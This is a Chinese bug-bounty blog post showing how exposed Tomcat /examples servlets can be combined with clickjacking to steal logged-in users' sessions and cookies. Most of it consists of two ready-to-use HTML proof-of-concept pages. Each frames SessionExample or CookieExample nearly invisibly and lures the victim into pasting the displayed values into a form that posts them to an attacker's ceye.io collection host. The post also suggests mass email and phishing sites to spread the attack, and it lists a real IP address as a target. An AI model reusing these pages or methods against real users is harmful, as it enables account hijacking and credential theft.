vlambda博客
学习文章列表

挖洞经验之Tomcat Examples利用

一、内容:挖洞经验 利用Tomcat Examples劫持任意账号,从而获得高危赏金

二、前提:如果当前系统刚好采用tomcat容器的cookie或者session进行

三、案例:

访问:http://**/examples/[1]

扫描目录发现存在 examples

  如果当前系统刚好采用tomcat容器的cookie或者session进行身份验证,利用点击劫持,那么是有机会劫持登陆用户的身份信息

常见的session路径:/examples/servlets/servlet/SessionExample

常见的Cookie路径:/examples/servlets/servlet/CookieExample

session劫持POC,保存为html:

<head>

<style>

iframe#fgframe {opacity:5%;}

</style>

</head>

<h1>LSP专用</h1>

<h2>只需要ctrl +c ;ctrl + v ;点击一下就可以了</h2>

<iframe id = "fgframe" height="650px" width="400px" src = "http://IP/examples/servlets/servlet/SessionExample">



</iframe>

<form action="http://xxxx.ceye.io" method="POST">

<div>

<lable for = "say"> 你敢弄不?</lable>

<textarea id = "cookie" name = "cookie" rows ="4" cols="50">

</textarea>

<div>

<div>

<button>点下就给个高危</button>

</div>

</form>

cookie劫持POC,保存为html:

<head>

<style>

iframe#fgframe {opacity:5%;}

</style>

</head>

<h1>LSP专用</h1>

<h2>只需要ctrl +c ;ctrl + v ;点击一下就可以了</h2>

<iframe id = "fgframe" height="650px" width="400px" src="http://IP/examples/servlets/servlet/CookieExample">



</iframe>

<form action="http://xxxx.ceye.io" method="POST">

<div>

<lable for = "say"> 你敢弄不?</lable>

<textarea id = "cookie" name = "cookie" rows ="4" cols="50">

</textarea>

<div>

<div>

<button>点下就给个高危</button>

</div>

</form>

最终效果:

成功劫持到信息!!!

四、技术点总结:

1、需要受害者先登陆系统,然后利用examples特性获取当前用户session或者cookie

2、利用点击劫持诱导用户做出操作,并将数据转发到自己的服务器上面

3、利用批量邮件或者钓鱼网站扩大危害

4、常见的session路径:/examples/servlets/servlet/SessionExample

5、常见的Cookie路径:/examples/servlets/servlet/CookieExample

漏洞参照:

https://hackerone.com/reports/674741

References

[1] http://**/examples/: http://117.186.248.41/examples